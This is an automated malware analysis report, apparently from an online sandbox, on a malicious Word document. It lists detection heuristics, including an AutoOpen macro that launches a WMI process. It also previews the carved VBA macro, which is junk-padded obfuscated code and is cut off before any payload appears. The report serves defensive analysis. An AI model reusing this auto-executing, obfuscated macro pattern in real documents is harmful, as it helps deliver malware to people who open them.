MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. The macro utilizes GetObject and CreateObject to launch a WMI process, indicating an attempt to execute arbitrary code or download a secondary payload. The presence of legacy WordBasic markers and the specific WMI process creation heuristic strongly suggest malicious intent.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6942037-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6942037-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29989 bytes |
SHA-256: b74fbbeda974d5fcc23d20cda08cb24c30d933113cf4ae9683d06480c9c8bcb7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NxAGDB11"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zBAkCAw"
Attribute VB_Base = "0{6E9BFDDD-6AD6-4925-917E-79F61DB24CE4}{90AC1B49-7801-435B-AF7D-E652FD62080D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "jAAAADAA"
Attribute VB_Base = "0{FDD289FE-CFDB-4119-98D0-243BABC069B8}{4173F391-F101-4438-A999-4C9EB3150D3D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AcAAA_A"
Sub autoopen()
If JAkQU1A = k_ACQQo Then
Select Case zxwcA_A
Case 813948465
z4Qo4AD = Rnd(CQoQA_U + 299388730 + 18960693 / dUxkBQ)
uGkoUA = CByte(IBXAUAAA + 725905673 + PQDA4AB + 923829418)
Case 281983548
QA_o_cA = kQAwAAA
YAUZ1BU = Tan(bABAowQ - CSng(tAGADA4))
End Select
End If
If wDkcAAA = AADQUA4B Then
Select Case DUDBAAcU
Case 418679803
bUUQAU = Rnd(iAADAo + 917057834 + 256549040 / R_oBADC)
aAAwxoAZ = CByte(nAA4AB_A + 330315580 + lAQxDDAc + 960767382)
Case 59995169
iZAQXo = T11_DDB
PXAwkQUA = Tan(qBQAoCcG - CSng(DAABx1UD))
End Select
End If
DxxkQAA
If fZGBAAUB = dCAxD4B Then
Select Case nXXADAQ
Case 635280604
S4kxAA = Rnd(kAkDDBxZ + 391625815 + 497833329 / SBDBcA)
OAo1AA = CByte(YCAGxAoA + 267638673 + fAoC1A + 479574850)
Case 871518449
cxQoAZ_ = c_A1AAX4
wA14QAB = Tan(iCAAAw - CSng(bQk1Ao_B))
End Select
End If
If z_AUAcAU = iwQ1UGA Then
Select Case hAcDDC
Case 44442605
ODC4oBBx = Rnd(S1Q1oCk + 816044242 + 684342563 / vUGGA1x)
XxUxDBUc = CByte(XDDUAokk + 90673243 + GDA1DU1A + 538268837)
Case 558805638
ZDA4ZX1B = AQwBGAA
wGBAGA = Tan(sDDBkAAo - CSng(PAAQBBG))
End Select
End If
End Sub
Attribute VB_Name = "pxQkAU"
Function DxxkQAA()
On Error Resume Next
If M_xZ1Qx = RoAAxw Then
Select Case qkDcwo
Case 179014830
ikUDk_A = Rnd(lAUZA1A + 599922612 + 958408624 / mAAkwk)
XxBBAcX = CByte(IwAAAQZ + 801652821 + PDAAAw + 890144142)
Case 590039148
OBckDc = wcQ4UA
cAAAUADA = Tan(OUA4QDo - CSng(Qw1AAA))
End Select
End If
If jDD_kQ4 = FXABAw Then
Select Case mAAAw4o
Case 842408286
vXAQ4cQA = Rnd(kUAA_GC + 256575474 + 688930360 / lA1x1CcU)
fAUGAQD = CByte(qAAQAx + 890827162 + dAAABAXk + 48496232)
Case 752266333
nw1ADA = kA4GZA
PAcUox = Tan(s_wBZAU4 - CSng(CBAUBk))
End Select
End If
If 8300 < 90525 Then
ko14UxUA = vbFalse
If dBBAAUAo = LAoXok_A Then
Select Case AAAoA1
Case 540593426
JDAoA1 = Rnd(voA_BU + 314301628 + 758805090 / BoAAQQ)
hGCXQo4B = CByte(zA4AQoQ + 388181911 + Iw4kAcZA + 762934153)
Case 267103723
RAAGAUD = zQAAAUkD
HQUAADB = Tan(S_DAx_k - CSng(rAAxDc))
End Select
End If
If i_UUZA = MAwwAB Then
Select Case mo4wBC_
Case 903483643
aAQAZQZ = Rnd(wcAGc1UQ + 500751947 + 728720609 / f__ABA1)
zZAxCBB = CByte(lA_AQ_1X + 624026011 + VcXBkAA1 + 112852857)
Case 649463829
zAcZxA = HAGxUoC
BGAUQA = Tan(iAxBAG - CSng(dQUQC1))
End Select
End If
If AAAGUUBB = CkQUAAD Then
Select Case XAQA1_
Case 91009947
o
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.